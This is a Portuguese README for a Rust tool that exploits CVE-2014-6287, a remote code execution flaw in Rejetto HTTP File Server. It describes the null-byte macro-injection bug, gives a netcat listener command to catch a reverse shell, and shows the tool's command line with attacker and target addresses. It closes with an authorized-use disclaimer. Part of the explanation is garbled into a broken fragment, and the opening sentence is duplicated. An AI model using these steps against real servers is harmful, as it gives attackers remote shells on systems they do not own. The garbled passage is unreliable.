
Uma implementação em Rust do exploit CVE-2014-6287 direcionado às versões 2.3x anteriores à 2.3c do Rejetto HTTP File Server (HFS).
Uma implementação em Rust da exploração da CVE-2014-6287 voltada para o Rejetto HTTP File Server (HFS) versões 2.3x anteriores à 2.3c.
CVE-2014-6287 é uma vulnerabilidade crítica de execução remota de código no Rejetto HTTP File Server (HFS).
A função findMacroMarker em parserLib.pas no Rejetto HTTP File Server permite que atacantes remotos executem programas arbitrários por meio de uma sequência %00 em uma ação de pesquisa. Essa vulnerabilidade possibilita que atacantes contornem a validação de entrada e injetem código malicioso que é executado no sistema alvo.
A exploração funciona da seguinte forma:
%00){. e .}Antes de executar a exploração, configure um listener na sua máquina atacante para capturar o shell reverso:
# Substitua <LPORT> pela porta de escuta desejada
nc -lvnp <LPORT>
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]
-l, --lhost <LHOST>: Seu endereço IP local (máquina atacante)-p, --lport <LPORT>: Sua porta local para o shell reverso-r, --rhost <RHOST>: Endereço IP do alvo (servidor HFS vulnerável)-t, --rport <RPORT>: Porta do alvo (padrão: 80)Esta ferramenta destina-se apenas a fins educacionais e de testes de penetração autorizados. Use com responsabilidade e somente em sistemas que você possui ou para os quais tenha permissão explícita.